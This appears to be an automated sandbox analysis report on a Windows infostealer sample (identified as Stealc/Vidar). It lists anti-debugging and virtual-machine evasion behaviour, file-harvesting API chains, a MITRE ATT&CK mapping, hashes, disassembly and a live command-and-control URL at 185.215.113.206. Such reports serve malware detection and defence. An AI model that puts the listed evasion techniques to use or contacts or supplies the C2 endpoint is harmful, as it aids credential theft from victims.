                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108EE1C second address: 108EE22 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108F56E second address: 108F572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108F572 second address: 108F58B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB475210803h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108F58B second address: 108F5AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4752721A4h 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push esi 0x0000000b pop esi 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108FE02 second address: 108FE0E instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB4752107F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108FE0E second address: 108FE24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4752721A0h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108FE24 second address: 108FE50 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jns 00007FB4752107FAh 0x0000000f push edi 0x00000010 pop edi 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FB475210801h 0x0000001a jno 00007FB4752107F6h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10900E6 second address: 10900F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007FB47527219Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10900F3 second address: 1090122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FB4752107FAh 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FB475210800h 0x00000015 popad 0x00000016 push esi 0x00000017 jns 00007FB4752107F6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1090372 second address: 1090378 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1090922 second address: 109092A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109092A second address: 1090932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEFFA2 second address: FEFFC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FB4752107F6h 0x0000000a pop eax 0x0000000b jns 00007FB475210809h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10990AD second address: 10990B3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: E8D9DC instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 10275EC instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 10B143D instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\file.exe Evaded block: after key decision graph_0-39110
                Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BB40F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00BB40F0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BAE530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_00BAE530
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BAF7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00BAF7B0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BB47C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_00BB47C0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BA1710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00BA1710
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BADB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_00BADB80
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BB3B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_00BB3B00
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BB4B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00BB4B60
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BAEE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_00BAEE20
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BABE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_00BABE40
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BADF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00BADF10
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BA1160 GetSystemInfo,ExitProcess, 0_2_00BA1160
                Source: file.exe, file.exe, 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2176326944.0000000001365000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2176326944.0000000001333000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2176326944.00000000012EE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: file.exe, 00000000.00000002.2176326944.0000000001365000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWA
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-37925
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-37922
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-37810
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-37937
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-37945
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-37977
                Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe File opened: SICE
                Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BA4610 VirtualProtect ?,00000004,00000100,00000000 0_2_00BA4610
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BB9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00BB9BB0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BB9AA0 mov eax, dword ptr fs:[00000030h] 0_2_00BB9AA0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BB7690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA, 0_2_00BB7690
                Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match | File source: Process Memory Space: file.exe PID: 6644, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BB9790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BB98E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle
                Source: file.exe, file.exe, 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: QProgram Manager
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BE75A8 cpuid
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BB7D20 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BB6BC0 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BB79E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BB7BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

                Stealing of Sensitive Information

                Source: Yara match | File source: 0.2.file.exe.ba0000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.2131533461.00000000052D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2176326944.00000000012EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 6644, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara match | File source: 0.2.file.exe.ba0000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.2131533461.00000000052D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2176326944.00000000012EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 6644, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

                MITRE ATT&CK Matrix (listed per tactic; a number before a technique is the report's count of matching signatures for that technique, techniques without a number are unmatched matrix placeholders)

                Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies
                Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless
                Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
                Execution: 2 Command and Scripting Interpreter, 12 Native API, At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job
                Persistence: 1 DLL Side-Loading, Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
                Privilege Escalation: 11 Process Injection, 1 DLL Side-Loading, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
                Defense Evasion: 1 Masquerading, 33 Virtualization/Sandbox Evasion, 11 Disable or Modify Tools, 11 Process Injection, 1 Deobfuscate/Decode Files or Information, 3 Obfuscated Files or Information, 12 Software Packing, 1 DLL Side-Loading
                Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
                Discovery: 2 System Time Discovery, 641 Security Software Discovery, 33 Virtualization/Sandbox Evasion, 13 Process Discovery, 1 Account Discovery, 1 System Owner/User Discovery, 1 File and Directory Discovery, 334 System Information Discovery
                Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services
                Collection: 1 Archive Collected Data, Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
                Command and Control: 2 Encrypted Channel, 2 Ingress Tool Transfer, 2 Non-Application Layer Protocol, 12 Application Layer Protocol, Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol
                Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
                Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Source | Detection | Scanner | Label | Link
                file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
                file.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                https://docs.rs/getrandom#nodejs-es-module-support | 0% | URL Reputation | safe |
                No contacted domains info
                Name | Malicious | Antivirus Detection | Reputation
                http://185.215.113.206/6c4adf523b719729.php | true | | unknown
                http://185.215.113.206/ | true | | unknown
                                Name | Source | Malicious | Antivirus Detection | Reputation
                                http://185.215.113.206/6c4adf523b719729.php/2 | file.exe, 00000000.00000002.2176326944.0000000001355000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                                http://185.215.113.206/6c4adf523b719729.php3 | file.exe, 00000000.00000002.2176326944.000000000134A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                                http://185.215.113.206/6c4adf523b719729.php. | file.exe, 00000000.00000002.2176326944.00000000012EE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                                http://185.215.113.206/6c4adf523b719729.php/ | file.exe, 00000000.00000002.2176326944.0000000001355000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                                http://185.215.113.206/:U | file.exe, 00000000.00000002.2176326944.00000000012EE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                                http://185.215.113.206 | file.exe, 00000000.00000002.2176326944.00000000012EE000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                                https://docs.rs/getrandom#nodejs-es-module-support | file.exe, file.exe, 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2131533461.00000000052FB000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                                IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                185.215.113.206 | unknown | Portugal | | 206894 | WHOLESALECONNECTIONSNL | true
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1544952
                                Start date and time:2024-10-29 22:12:12 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 3m 23s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:2
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:file.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@1/0@0/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 80%
                                • Number of executed functions: 19
                                • Number of non-executed functions: 127
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Stop behavior analysis, all processes terminated
                                • Exclude process from analysis (whitelisted): dllhost.exe
                                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • VT rate limit hit for: file.exe
                                No simulations
                                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                185.215.113.206 | file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
                                | file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
                                | file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
                                | file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
                                | file.exe | malicious | Stealc | 185.215.113.206/
                                | file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
                                | file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
                                | file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
                                | file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
                                | file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
                                No context
                                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, LummaC Stealer | 185.215.113.16
                                | file.exe | malicious | Stealc, Vidar | 185.215.113.206
                                | file.exe | malicious | LummaC, Amadey, LummaC Stealer | 185.215.113.16
                                | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 185.215.113.16
                                | file.exe | malicious | Stealc | 185.215.113.206
                                | file.exe | malicious | Stealc, Vidar | 185.215.113.206
                                | file.exe | malicious | Stealc, Vidar | 185.215.113.206
                                | file.exe | malicious | LummaC | 185.215.113.16
                                | file.exe | malicious | LummaC | 185.215.113.16
                                | file.exe | malicious | Stealc | 185.215.113.206
                                No context
                                No context
                                No created / dropped files found
                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.960426913773684
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:file.exe
                                File size:2'094'592 bytes
                                MD5:31c844530d857c4266248543c40284cc
                                SHA1:97f7aae6867695e025abdc5e1a7d446d7c5b875f
                                SHA256:81ccbbfcfd5e8991632a16d6b4d28b36ef74409773b3e5622cf58cf43638ce07
                                SHA512:8ea1e7b81251c07032a4d78eff745f316e7b9a28ca3e003de63ed4190589d85f8f25ae512e0f4f95b5388d92ed38da954c517b996c381f51c237a437123a482f
                                SSDEEP:49152:/nNForSjuTyy880u4Ld2ZxkryOFAMsfcCNxvBdVl46Pu:/nNCrSjUvUuxEAMBSrVP
                                TLSH:04A533F31C2644F1DC9549779DE30960A06DB9A2AF2DBF2E322F9620581F8C25B2D5F4
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...
                                Icon Hash:00928e8e8686b000
                                Entrypoint:0xb13000
                                Entrypoint Section:.taggant
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                Time Stamp:0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:1
                                File Version Major:5
                                File Version Minor:1
                                Subsystem Version Major:5
                                Subsystem Version Minor:1
                                Import Hash:2eabe9054cad5152567f0699947a2c5b
                                Instruction
                                jmp 00007FB4750BBD9Ah
                                paddq mm3, qword ptr [edi]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add cl, ch
                                add byte ptr [eax], ah
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [esi], al
                                add byte ptr [eax], 00000000h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                adc byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add al, 0Ah
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                xor byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                and al, 00h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                and dword ptr [eax], eax
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                push es
                                or al, byte ptr [eax]
                                add byte ptr [edx], al
                                or al, byte ptr [eax]
                                add byte ptr [edx+ecx], al
                                add byte ptr [eax], al
                                add ecx, dword ptr [edx]
                                add byte ptr [eax], al
                                add dword ptr [edx], ecx
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                Programming Language:
                                • [C++] VS2010 build 30319
                                • [ASM] VS2010 build 30319
                                • [ C ] VS2010 build 30319
                                • [ C ] VS2008 SP1 build 30729
                                • [IMP] VS2008 SP1 build 30729
                                • [LNK] VS2010 build 30319
                                Name | Virtual Address | Virtual Size | Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2e9050 | 0x64 | .idata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2e91f8 | 0x8 | .idata
                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
